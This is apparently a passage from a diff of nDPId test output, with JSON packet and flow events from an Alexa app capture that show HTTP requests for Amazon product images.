-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0apBAAEAGhb+sECrYNFQ\/OMsaAFCdOh5V47HfxIAQAVeHGAAAAQEICgD2dN9s+naY"} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1490976134141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134141,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xZVAAEAGKrKsECrYNFQ\/OMsSAFCeYrcjAAAAAKAC\/\/9o9QAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134144,"flow_last_seen":1490976134144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134144,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1490976134144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134144,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85X5AAEAGCsmsECrYNFQ\/OMsTAFDQ0pfIAAAAAKAC\/\/9V3wAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134146,"flow_last_seen":1490976134146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134146,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1490976134146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134146,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TQZAAEAGo0GsECrYNFQ\/OMsUAFAHRT+wAAAAAKAC\/\/93hAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134148,"flow_last_seen":1490976134148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134148,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1490976134148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134148,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8vDBAAEAGNBesECrYNFQ\/OMsVAFCK3c6GAAAAAKAC\/\/9lFAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134149,"flow_last_seen":1490976134149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1490976134149,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134149,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EjJAAEAG3hWsECrYNFQ\/OMsWAFAy6mCEAAAAAKAC\/\/8rCQAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2040,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1490976134198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134198,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxXC1q1Wit3Oh6AScSCcZgAAAgQFtAQCCAps+npUAPZytgEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2041,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxSwmxNdB0U\/saAScSBYswAAAgQFtAQCCAps+nysAPZytgEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2042,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxG999POw2qqP6AScSBjDwAAAgQFtAQCCAps+n3SAPZytQEDAwg="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 
